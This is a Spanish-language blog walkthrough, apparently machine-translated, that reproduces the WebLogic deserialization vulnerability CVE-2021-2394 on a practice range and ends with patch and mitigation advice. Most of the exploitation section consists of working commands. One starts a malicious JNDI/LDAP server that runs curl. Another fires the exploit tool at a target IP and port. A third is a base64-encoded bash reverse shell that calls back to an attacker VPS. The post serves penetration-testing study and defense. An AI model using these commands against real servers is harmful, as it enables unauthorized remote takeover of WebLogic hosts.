Herramienta de explotación y reproducción de vulnerabilidades de deserialización de WebLogic (CVE-2021-2394)

1. Visión general de la vulnerabilidad

Oracle lanzó oficialmente el Aviso de actualización de seguridad de julio de 2021, que reveló que existen vulnerabilidades de alto riesgo en los componentes de WebLogic y que los atacantes pueden atacar los componentes vulnerables del servidor WebLogic a través de los protocolos IIOP y T3 sin autorización. Un atacante que explotara con éxito esta vulnerabilidad podría apoderarse de WebLogic Server.

Esta es una vulnerabilidad de deserialización secundaria. Las cadenas de llamadas de CVE-2020-14756 y CVE-2020-14825 se combinan para formar una nueva cadena de llamadas para eludir la lista negra de weblogic.

2. Ámbito de influencia

Servidor Oracle WebLogic 10.3.6.0.0

Servidor Oracle WebLogic 12.1.3.0.0

Servidor Oracle WebLogic 12.2.1.3.0

Servidor Oracle WebLogic 12.2.1.4.0

Servidor Oracle WebLogic 14.1.1.0.0

3. Reproducir el entorno

   campo de tiro en línea vulfocus

a6c2b0ddd722484c98bb91cfca855a47.png

4. Recurrencia de la vulnerabilidad 

Las siguientes herramientas son necesarias para la reproducción:

Inyección JDNI: https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 

 Explotación: https://download.csdn.net/download/qq_41904294/87667743

Inicie el campo de tiro y verifique si el entorno está listo (versión repro: 12.2.1.3.0)

33b6a91de4224ca0b565c2489565fe8c.png

Use JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar para abrir un servicio ldap malicioso, déjelo ejecutar un curl aquí

instrucción

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl vpsip" -A vpsip

python3 inicia un servicio http

python3 -m http.server 80

Inyección maliciosa usando herramientas de explotación

 java -jar weblogic\ tools.jar -H 123.58.224.8 -P 30706 -payload 20212394 -jndi ldap://x.x.x.x:1389/xxx

# -H是目标地址(weblogicServerIP) -P是目标端口 -jndl 是开启的ldap服务地址

43a998f9d46a44ccab673137ff4f98ab.png

265e2f1f9a7d4c36b39e1821ffed63fd.png 3965b3e585f74ef984e014a16e684677.png

Como puede ver, el comando curl se ejecutó con éxito

caparazón de rebote

 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar abre un servicio ldap

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}" -A VPSip

Swiss Army Knife comienza a monitorear por adelantado y usa el conjunto de herramientas para permitir que el objetivo cargue el servicio ldap y realice una operación de shell inversa

91d4ba384e6044838e428d55e51e2ea6.png

8d107cfdacf34f1fb54853b52dced2a0.png Rebote con éxito, leer bandera

1a85209fdb834b9f8a5e538cde2d7f57.png

 5. Sugerencia de reparación

actualización de parche

Oracle ha lanzado parches para corregir las vulnerabilidades mencionadas anteriormente. Consulte el anuncio oficial para descargar los parches de actualización para los productos afectados a tiempo, y consulte el archivo Léame en el paquete de instalación del parche para instalar y actualizar para garantizar una efectividad a largo plazo. proteccion.

Nota: el parche oficial de Oracle requiere que el usuario tenga una cuenta con licencia del software original. Después de iniciar sesión en https://support.oracle.com con esta cuenta, puede descargar el parche más reciente.

Mitigación Temporal

Si el usuario no puede instalar el parche de actualización temporalmente, la vulnerabilidad puede protegerse temporalmente con las siguientes medidas:

(1) Restringir el acceso al protocolo T3

Los usuarios pueden bloquear temporalmente los ataques que aprovechan las vulnerabilidades del protocolo T3 controlando el acceso al protocolo T3. WebLogic Server proporciona un filtro de conexión predeterminado llamado weblogic.security.net.ConnectionFilterImpl. Este filtro de conexión acepta todas las conexiones entrantes. Puede configurar reglas a través de este filtro de conexión para controlar el acceso a los protocolos T3 y T3s.

(2) Deshabilitar el protocolo IIOP

Los usuarios pueden bloquear ataques que explotan vulnerabilidades en el protocolo IIOP deshabilitando el protocolo IIOP.

Link de referencia

https://www.oracle.com/security-alerts/cpujul2021.html#AppendixFMW

 

 

 

 

 

Supongo que te gusta

Origin blog.csdn.net/qq_41904294/article/details/130033914
Recomendado
Clasificación